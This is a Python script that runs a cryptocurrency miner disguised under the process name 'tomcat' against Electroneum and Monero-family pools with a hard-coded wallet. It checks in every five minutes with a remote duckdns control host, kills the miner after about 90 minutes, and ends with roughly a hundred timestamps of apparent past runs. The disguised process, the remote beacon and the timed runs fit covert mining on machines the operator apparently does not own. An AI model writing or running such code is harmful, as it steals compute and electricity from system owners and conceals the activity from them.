import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:37:07.529703
#2018-02-17 17:25:06.922287
#2018-02-17 19:14:02.050993
#2018-02-17 21:04:04.255603
#2018-02-17 22:49:04.812433
#2018-02-18 00:33:07.611051
#2018-02-18 02:23:05.466011
#2018-02-18 04:10:05.907753
#2018-02-18 06:01:01.780872
#2018-02-18 07:51:06.598915
#2018-02-18 09:39:03.808497
#2018-02-18 11:24:04.626137
#2018-02-18 13:10:01.404960
#2018-02-18 14:58:04.457554
#2018-02-18 16:47:07.436438
#2018-02-18 18:35:08.469107
#2018-02-18 20:23:04.828467
#2018-02-18 22:08:07.493103
#2018-02-18 23:56:04.159530
#2018-02-19 01:42:03.284724
#2018-02-19 03:30:09.118941
#2018-02-19 05:16:05.619095
#2018-02-19 07:02:04.970134
#2018-02-19 08:49:01.431208
#2018-02-19 10:39:08.452870
#2018-02-19 12:26:04.014545
#2018-02-19 14:13:01.681493
#2018-02-19 16:04:06.381960
#2018-02-19 17:52:01.861187
#2018-02-19 19:38:06.652857
#2018-02-19 21:26:05.634182
#2018-02-19 23:13:02.236549
#2018-02-20 00:58:01.382194
#2018-02-20 02:47:04.133055
#2018-02-20 04:35:06.293134
#2018-02-20 06:19:07.291728
#2018-02-20 08:04:06.728541
#2018-02-20 09:49:07.662420
#2018-02-20 11:32:08.427682
#2018-02-20 13:18:09.870789
#2018-02-20 15:04:01.785003
#2018-02-20 16:49:07.410378
#2018-02-20 18:37:07.374039
#2018-02-20 20:29:01.578548
#2018-02-20 22:14:05.930481
#2018-02-20 23:57:05.866782
#2018-02-21 01:42:01.961737
#2018-02-21 03:30:07.253708
#2018-02-21 05:18:02.085206
#2018-02-21 07:05:14.493184
#2018-02-21 08:51:01.828125
#2018-02-21 10:38:05.964530
#2018-02-21 12:25:09.264894
#2018-02-21 14:12:04.712370
#2018-02-21 15:57:10.499446
#2018-02-21 17:50:02.815376
#2018-02-21 19:35:09.080225
#2018-02-21 21:22:07.858501
#2018-02-21 23:08:06.006553
#2018-02-22 00:57:05.430345
#2018-02-22 02:47:06.616708
#2018-02-22 04:35:03.784699
#2018-02-22 06:20:06.155229
#2018-02-22 08:07:05.630532
#2018-02-22 09:54:07.346289
#2018-02-22 11:39:01.947951
#2018-02-22 13:26:08.823486
#2018-02-22 15:14:01.664580
#2018-02-22 16:58:07.864689
#2018-02-22 18:47:11.438769
#2018-02-22 20:40:11.102460
#2018-02-22 22:27:05.148942
#2018-02-23 00:12:03.977525
#2018-02-23 02:01:07.898224
#2018-02-23 03:49:01.790811
#2018-02-23 05:41:07.733440
#2018-02-23 07:26:06.546109
#2018-02-23 09:31:05.464487
#2018-02-23 11:38:06.118516
#2018-02-23 13:27:01.914633
#2018-02-23 15:12:08.873437
#2018-02-23 17:01:08.685139
#2018-02-23 18:50:04.224823
#2018-02-23 20:35:09.917872
#2018-02-23 22:21:08.388917
#2018-02-24 00:07:07.373397
#2018-02-24 01:59:04.929895
#2018-02-24 03:50:02.690356
#2018-02-24 05:38:01.508921
#2018-02-24 07:26:01.720722
#2018-02-24 09:14:04.899425
#2018-02-24 11:10:01.513391
#2018-02-24 12:58:07.049122
#2018-02-24 14:46:05.552270
#2018-02-24 16:38:05.099026
#2018-02-24 18:26:07.639873
#2018-02-24 20:13:06.217417
#2018-02-24 22:01:06.194996
#2018-02-25 00:59:04.664928
#2018-02-25 04:44:07.220385
#2018-02-25 08:52:03.133340